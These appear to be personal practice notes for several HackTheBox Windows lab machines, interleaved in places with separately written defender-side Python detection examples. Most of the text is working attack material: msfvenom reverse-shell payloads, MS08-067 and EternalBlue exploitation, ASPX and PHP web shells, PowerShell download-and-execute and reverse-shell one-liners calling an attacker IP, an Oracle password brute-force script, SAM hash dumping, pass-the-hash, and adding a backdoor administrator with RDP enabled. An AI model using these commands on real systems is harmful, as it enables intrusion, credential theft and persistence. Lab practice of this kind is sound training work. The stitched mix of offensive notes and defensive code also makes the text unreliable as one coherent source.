My Practice on HTB Windows boxes
Windows
htb
One method:
nmap -sT -p- --min-rate 10000 -oA nmap/alltcp 10.10.10.4
SMB: smbmap -H 10.10.10.4
nmap vuln scanner for smb: nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
smb-vuln-ms08-067: vulnerable
SMB exploits, MS-08-067 (made famous by Conficker) and MS-17-010 (made famous by Shadow Brokers).
for changing the shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
python ms08-067.py 10.10.10.4 6 445
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe
transfer whoami.exe binary from kali to windows xp
smbserver.py a /usr/share/windows-binaries/
C:\WINDOWS\system32>\\10.10.14.14\a\whoami.exe
==========================================================
nmap: nmap -A -vv --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-ms17-010 -p445 10.10.10.40
open services: smb
smbmap -u guest -H ip
it's vulnerable to the EternalBlue vulnerability, CVE-2017-0143
Using the windows/smb/ms17_010_eternalblue module in Metasploit, we can successfully get a shell as nt authority!
https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py - put the mysmb.py script in the same folder as the exploit
vi /etc/hosts (map haris-pc to 10.10.10.40)
smbclient -L //10.10.10.40 -N
smbclient -L //haris-pc -N
smb verification: smbclient //haris-pc/Users
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=port -f exe > blue.exe
exploit modification: set the username to guest and adjust the exploit accordingly
smb_send file exploit
smbfile smbexec
python exploit.py ip ntsvcs - boom
more root.txt
further exploitation - enable rdp and add a user
net user hacker hacker /add
net localgroup administrators hacker /add
enabling rdp: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
3389 enabled
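The defender's side of the "add a user and enable RDP" steps above, as an added example that is not part of these notes or of any tool they mention: it correlates Windows Security events 4720 (user created), 4732 (member added to a local group) and 4657 (registry value changed, here fDenyTSConnections going to 0) on one host inside a time window and raises a single alert. The event records are constructed with the real events' EventData field names, and `correlate_persistence` is a hypothetical function name.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real log data). Field names follow the
# EventData names of Security events 4720, 4732 and 4657. Event 4657 only
# appears if a SACL audits the Terminal Server key; Sysmon event 13 carries
# the same information and can be mapped onto these names.
SAMPLE_EVENTS = [
    {"ts": "2024-01-05T22:18:01", "host": "haris-pc", "EventID": 4624,
     "TargetUserName": "guest"},
    {"ts": "2024-01-05T22:18:06", "host": "haris-pc", "EventID": 4720,
     "SubjectUserName": "haris-pc$", "TargetUserName": "hacker"},
    {"ts": "2024-01-05T22:18:09", "host": "haris-pc", "EventID": 4732,
     "SubjectUserName": "haris-pc$", "TargetUserName": "Administrators",
     "MemberName": "hacker"},  # real 4732 events often carry only MemberSid; resolve it first
    {"ts": "2024-01-05T22:18:20", "host": "haris-pc", "EventID": 4657,
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "ObjectValueName": "fDenyTSConnections", "OldValue": "1", "NewValue": "0"},
    # benign: a helpdesk admin creating an account, nothing follows it
    {"ts": "2024-01-06T09:00:00", "host": "dc01", "EventID": 4720,
     "SubjectUserName": "helpdesk", "TargetUserName": "jsmith"},
]

ADMIN_GROUPS = {"administrators", "remote desktop users"}


def _rdp_enabled(e):
    return (e["EventID"] == 4657
            and e.get("ObjectValueName", "").lower() == "fdenytsconnections"
            and str(e.get("NewValue")) == "0")


def _added_to_admins(e, user):
    return (e["EventID"] == 4732
            and e.get("TargetUserName", "").lower() in ADMIN_GROUPS
            and e.get("MemberName", "").lower() == user.lower())


def correlate_persistence(events, window=timedelta(minutes=30)):
    """For every 4720 on a host, look at what follows on that host within
    `window`. Account creation alone is routine, so an alert is raised only
    when the new account lands in an admin/RDP group or RDP is switched on;
    both together is the full chain from the notes and is rated high."""
    by_host = {}
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort as text
        by_host.setdefault(e["host"], []).append(e)

    alerts = []
    for host, evs in by_host.items():
        for i, created in enumerate(evs):
            if created["EventID"] != 4720:
                continue
            user = created["TargetUserName"]
            t0 = datetime.fromisoformat(created["ts"])
            stages = {"user_created": created["ts"]}
            for later in evs[i + 1:]:
                if datetime.fromisoformat(later["ts"]) - t0 > window:
                    break  # events are sorted, nothing later can be in the window
                if _added_to_admins(later, user):
                    stages["added_to_admin_group"] = later["ts"]
                if _rdp_enabled(later):
                    stages["rdp_enabled"] = later["ts"]
            if len(stages) > 1:
                alerts.append({"host": host, "user": user, "stages": stages,
                               "severity": "high" if len(stages) == 3 else "medium"})
    return alerts


if __name__ == "__main__":
    for a in correlate_persistence(SAMPLE_EVENTS):
        print(a["severity"], a["host"], a["user"], sorted(a["stages"]))
```

The window is the only tunable: the chain in the notes takes seconds, so 30 minutes is generous; widening it trades a few more benign "new admin account" hits for catching a slower operator.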
=============================================
htb windows
nmap -sT -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.5
found ftp open:
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
the server is running ASP.NET, so we can upload an aspx shell and get a reverse connection
locate cmd.aspx -> /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx
put cmd.aspx via ftp, then visit cmd.aspx in the browser
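What makes the upload above work is an anonymous-writable FTP root that is also the IIS webroot. As an added defender-side example (not from these notes, IIS or any tool named here), this is detection logic over IIS FTP W3C log lines: it reads the `#Fields:` header instead of assuming column order, then flags successful writes by the anonymous account and any upload of a file with a web-executable extension. The log lines are constructed, and `detect_ftp_uploads` is a hypothetical function name.

```python
import os

# Constructed IIS FTP log excerpt (W3C extended format, default field set).
# Not a real capture: session ids, addresses and timings are made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2017-03-17 16:37:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2017-03-17 16:37:01 10.10.14.14 - 10.10.10.5 21 USER anonymous 331 0 0 1a2b3c -
2017-03-17 16:37:02 10.10.14.14 anonymous 10.10.10.5 21 PASS *** 230 0 0 1a2b3c /
2017-03-17 16:37:05 10.10.14.14 anonymous 10.10.10.5 21 RETR iisstart.htm 226 0 0 1a2b3c /iisstart.htm
2017-03-17 16:37:12 10.10.14.14 anonymous 10.10.10.5 21 STOR cmd.aspx 226 0 0 1a2b3c /cmd.aspx
2017-03-17 16:37:40 10.10.14.14 anonymous 10.10.10.5 21 STOR blocked.aspx 550 5 0 1a2b3c /blocked.aspx
2017-03-17 16:40:00 10.10.14.20 webadmin 10.10.10.5 21 STOR welcome.png 226 0 0 4d5e6f /welcome.png
2017-03-17 16:41:00 10.10.14.20 webadmin 10.10.10.5 21 STOR upload.ashx 226 0 0 4d5e6f /upload.ashx
"""

WRITE_METHODS = {"STOR", "STOU", "APPE", "RNTO", "MKD", "DELE"}
# Extensions IIS executes, or that change how the site behaves when dropped in.
WEB_EXEC_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".php", ".exe", ".dll"}
ANONYMOUS_USERS = {"anonymous", "ftp"}


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header.
    Lines before the header, comments, and rows with the wrong column count
    are skipped rather than mis-assigned."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            parts = line.split()
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))


def detect_ftp_uploads(text):
    """Return alerts for successful write operations that were either done
    by an anonymous login or dropped a web-executable file into the root."""
    alerts = []
    for rec in parse_w3c(text):
        if rec["cs-method"].upper() not in WRITE_METHODS:
            continue
        if not rec["sc-status"].startswith("2"):
            continue  # 4xx/5xx: the server refused the write
        path = rec["x-fullpath"] if rec["x-fullpath"] != "-" else rec["cs-uri-stem"]
        ext = os.path.splitext(path)[1].lower()
        reasons = []
        if rec["cs-username"].lower() in ANONYMOUS_USERS:
            reasons.append("anonymous write")
        if ext in WEB_EXEC_EXT:
            reasons.append("web-executable file written")
        if reasons:
            alerts.append({"time": rec["date"] + " " + rec["time"], "src": rec["c-ip"],
                           "user": rec["cs-username"], "path": path, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_ftp_uploads(SAMPLE_LOG):
        print(a["time"], a["src"], a["user"], a["path"], ", ".join(a["reasons"]))
```

The "anonymous write" reason fires on its own, regardless of extension: the fix for this box-style misconfiguration is to make the anonymous account read-only (or point it at a directory outside wwwroot), and the log check confirms whether that is actually in force.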
web to shell- 3 ways (nc.exe, nishang, meterpreter)
create an smb server on the attacker machine and share nc.exe from it
locate nc.exe; cp /usr/share/windows-binaries/nc.exe smb/
run this command on the attacker machine: smbserver.py share smb
create a listener on the attacker machine
in the webshell run this command: \\10.10.14.14\share\nc.exe -e cmd.exe 10.10.14.14 443
nishang
copy Invoke-PowerShellTcp.ps1 from /opt/nishang/Shells to the smb directory
append this line to the end of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443
This will make it so that not only does the module load, but then the shell is called to give me a callback.
run this command in the webshell; it fetches the script from the python web server on the attacker machine and sends a shell back to the attacker machine: powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx
put met_rev_443.aspx
then run the listener in metasploit and get the system shell by visiting the aspx shell
Enumeration: systeminfo
Watson to check for potential vulnerabilities
For checking the .NET version: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
\\10.10.14.14\share\Watson.exe
\\10.10.14.14\share\MS11-046.exe
done boom
MS10-015
Run local exploit suggester : use post/multi/recon/local_exploit_suggester
I’ll give exploit/windows/local/ms10_015_kitrap0d a run.
==============================================================================
nmap -sC -sV -oA optimum 10.10.10.8
https://old.exploit-db.com/exploits/39161/
https://www.exploit-db.com/exploits/39161
change the script values (set your ip and port)
cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum
copy the windows binary (nc.exe) from kali to the target with the exploit
we got user shell
now turn to root shell: windows-exploit-suggester.py
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls
we use PowerShell Empire for the MS16-032 exploit. Under PowerShell/Empire there is a separate ps1 file for MS16-032; we will save it as Empire.ps1.
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.2/shell.ps1')"
searchsploit hfs 2.3
RCE on the system: copy nc into the specified folder and exploit through the python script
after getting user access, turn to windows-exploit-suggester
python windows-exploit-suggester.py --database <database>.xls --systeminfo <systeminfo>.txt
While this tool gave us some great suggestions, I found an easier exploit while looking around on Google.
ms16-098
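The windows-exploit-suggester step above (and Watson in the Devel notes) reads `systeminfo` to find bulletins a host is missing; the same parse is what a defender runs as a patch-gap check across a fleet. This is an added example, not from these notes or from either tool: it pulls the OS version and installed KBs out of constructed `systeminfo` output and reports which of the bulletins used in these notes have no matching KB. The bulletin-to-KB table is written from memory and should be checked against MSRC before acting on it; `patch_gap` and `parse_systeminfo` are hypothetical names.

```python
import re

# Bulletin -> KB article for the bulletins that appear in these notes.
# From memory, so verify against MSRC before acting on a result. Caveat:
# from October 2016 on Windows ships cumulative monthly rollups, so on a
# host that receives rollups a bulletin can be installed under a later KB
# number that is not in this table; treat a "missing" entry on such a host
# as "needs confirmation", not as proven unpatched.
BULLETIN_KB = {
    "MS08-067": "KB958644",   # SMB/netapi (Conficker)
    "MS10-015": "KB977165",   # KiTrap0D
    "MS11-046": "KB2503665",  # afd.sys
    "MS15-051": "KB3045171",  # win32k
    "MS16-032": "KB3139914",  # secondary logon
    "MS16-098": "KB3178466",  # win32k
    "MS17-010": "KB4013389",  # SMBv1 (EternalBlue)
}

# Constructed systeminfo excerpt; not copied from any real host.
SAMPLE_SYSTEMINFO = """Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB958644
                           [02]: KB977165
                           [03]: KB2503665
Network Card(s):           1 NIC(s) Installed.
"""

_KV = re.compile(r"^(OS Name|OS Version|Host Name|System Type):\s+(.*?)\s*$", re.M)
_KB = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.M | re.I)


def parse_systeminfo(text):
    """Return the header fields as os_name/os_version/... plus the set of
    installed KB numbers. 'Hotfix(s): N/A' (no updates at all) simply yields
    an empty set, because no '[nn]: KB...' rows follow it."""
    info = {k.lower().replace(" ", "_"): v for k, v in _KV.findall(text)}
    info["hotfixes"] = {kb.upper() for kb in _KB.findall(text)}
    return info


def patch_gap(text, table=BULLETIN_KB):
    """List the bulletins from `table` whose KB is absent from the host."""
    info = parse_systeminfo(text)
    missing = sorted(b for b, kb in table.items() if kb not in info["hotfixes"])
    return {
        "host": info.get("host_name", "?"),
        "os_name": info.get("os_name", "?"),
        "os_version": info.get("os_version", "?"),
        "installed": sorted(info["hotfixes"]),
        "missing": missing,
    }


if __name__ == "__main__":
    gap = patch_gap(SAMPLE_SYSTEMINFO)
    print(gap["host"], gap["os_name"], gap["os_version"])
    print("installed:", ", ".join(gap["installed"]))
    print("missing  :", ", ".join(gap["missing"]))
```

Feed it the saved `systeminfo.txt` of each host and the missing list is the patch ticket; because applicability differs by OS (MS08-067 does not apply to Windows 7, for instance), pair the result with the OS version before escalating.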
==================================================================
nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.9
I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.
run droopescan to find potential loopholes
Shell as iusr
searchsploit -m exploits/php/webapps/41564.php
$file = [ 'filename' => '0xdf.php', 'data' => '<?php system($_REQUEST["cmd"]); ?>' ];
apt install php-curl
hashcat -m 7900 admin.hash /usr/share/wordlists/rockyou.txt -o admin.cracked --force
Ruby script: However, on reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path.
I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning:
# Settings - Proxy information (nil to disable)
proxy_addr = '127.0.0.1'
proxy_port = 8080
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443
2nd method through nishang
python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"
with smbserver, transfer and run this: \\10.10.14.14\share\ms15-051x64.exe "whoami"
\\10.10.14.14\share\ms15-051x64.exe "\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"
======================================================
nmap -sC -sV -oA nmap/initial 10.10.10.82
odat sidguesser -s 10.10.10.82
guess bruteforce user and password
sqlplus SCOTT/tiger@10.10.10.82:1521/XE
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 .
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/Invoke-PowerShellTcp.ps1')
type "\users\Phineas\Desktop\Oracle issue.txt"
Memdump
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
volatility kdbgscan -f SILO-20180105-221806.dmp
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82
Oracle Execution
tasklist /v
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\users\administrator\desktop\root.txt
Shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe
upload the file: odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \temp shell.exe shell.exe
run the file: odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \temp shell.exe
If we check whoami /priv, we’ll see SeImpersonatePrivilege:
whoami /priv
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
=======================================
Notice that port 80 - Microsoft IIS httpd 8.5 is opened. Just note it down, it will be useful later on. Let’s focus on port 1521 (and sort of port 49160) instead - Oracle TNS listener 11.2.0.2.0 (unauthorized). Doing some enumeration I find out that this particular version of Oracle listener is vulnerable to remote TNS poisoning.
sqlplus scott/tiger@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=10.10.10.82)(Port=1521))(CONNECT_DATA=(SID=XE)))" AS SYSDBA
CREATE USER v3ded IDENTIFIED BY v3ded99;
GRANT dba TO v3ded;
ODAT: python odat.py all -s 10.10.10.82 -d XE -U v3ded -P v3ded99
[2.10] DBMS_XSLPROCESSOR library ? is enabled
DBMS_XSLPROCESSOR library is enabled and therefore allows us to put any files onto the machine. Here is the command that will do so:
python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U v3ded -P v3ded99 --putFile "c:\Windows\" "v3ded.txt" "/tmp/v3ded.txt"
now create the shell: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.193 LPORT=443 -f aspx > /tmp/v3dedShell.aspx
python odat.py dbmsxslprocessor -s ip -d XE -U v3ded -P pass --putFile "C:\inetpub\wwwroot\" "v3dedshell.aspx" "/tmp/v3dedshell.aspx"
after getting a shell, navigating to his Desktop directory I see an interesting file called "Oracle issues.txt".
Using Volatility to extract passwords
https://github.com/volatilityfoundation/volatility
python vol.py -f SILO-20180105-221806.dmp imageinfo
python vol.py -f ../SILO-2018.dmp --profile=Win8SP1x64 hivelist
python vol.py -f SILO-20180105-221806.dmp --profile=Win8SP1x64_18340 hivelist
==========================================
./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba
we create a new file named 1.bat with the content:
dir /a c:\users\
./odat.py
./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" 1.bat /root/Desktop/1.bat --sysdba
./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" 1.bat --sysdba
=================================================
nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.82
gobuster -u http://10.10.10.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html -t 30 - for dir hunting
Oracle db - port 1521 open, so we need the odat tool set up
1 - Identify SIDs
odat sidguesser -s 10.10.10.82
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'
So at this point we have four potential SIDs: 'XE', 'XEXDB', 'PLSExtProc', and 'CLRExtProc'.
3 - Guess / bruteforce user and pass
So I wrote a brute force script in python; using threads, it can go pretty quick:
#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool

MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"

def usage():
    print("{} [ip] [wordlist]".format(sys.argv[0]))
    print("    wordlist should be of the format [username]:[password]")
    sys.exit(1)

def scan(userpass):
    # one wordlist line is user:pass; anything after a second ':' is ignored
    u, p = userpass.split(':')[:2]
    try:
        # 'pass' is a python keyword, so the format placeholder is named pass_
        conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
        conn.close()
        return u, p, True
    except cx_Oracle.DatabaseError:
        return u, p, False

def main(ip, userpassfile, nprocs=MAX_PROC):
    global host
    host = ip  # set before the pool forks so the workers use the ip from argv

    with open(userpassfile, 'r') as f:
        userpass = f.read().rstrip().replace('\r', '').split('\n')

    pool = Pool(processes=nprocs)

    for username, pass_, status in pool.imap_unordered(scan, userpass):
        if status:
            print("Found {} / {}\n\n".format(username, pass_))
        else:
            sys.stdout.write("\r {}/{}    ".format(username, pass_))

if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
    main(sys.argv[1], sys.argv[2])
4 - Check out the database: sqlplus SCOTT/tiger@10.10.10.82:1521/XE
5 - db PrivEsc
select * from user_role_privs;
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
Similarly with odat, running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 .
Use SimpleHTTPServer to offer it, and then issue the following to the webshell: powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/Invoke-PowerShellTcp.ps1')
user.txt
type "\users\Phineas\Desktop\Oracle issue.txt"
we got a memory dump, Dropbox link: https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password: ?%Hm8646uC$
with the memory dump in hand, get the OS info from the box to pick the volatility profile: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
volatility kdbgscan -f SILO-20180105-221806.dmp
Profile suggestion (KDBGHeader): Win2012R2x64_18340
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
SYSTEM hive at 0xffffc00000028000, SAM hive at 0xffffc00000619000
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
try pass-the-hash: /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82
Oracle Execution: tasklist /v
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\users\administrator\desktop\root.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe
Now upload it:
odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \temp shell.exe shell.exe
And run it:
odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \temp shell.exe
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
This means that we can likely use RottenPotato (or LonelyPotato).
First, we’ll upload two files to the server. MSFRottenPotato.exe and rev.bat. The exe is from Decoder’s GitHub page for lonelypotato. The second is a simple powershell command to get a shell:
rev.bat:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
So, from our low priv shell, grab the files:
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
run it: c:\temp\lp.exe * \temp\rev.bat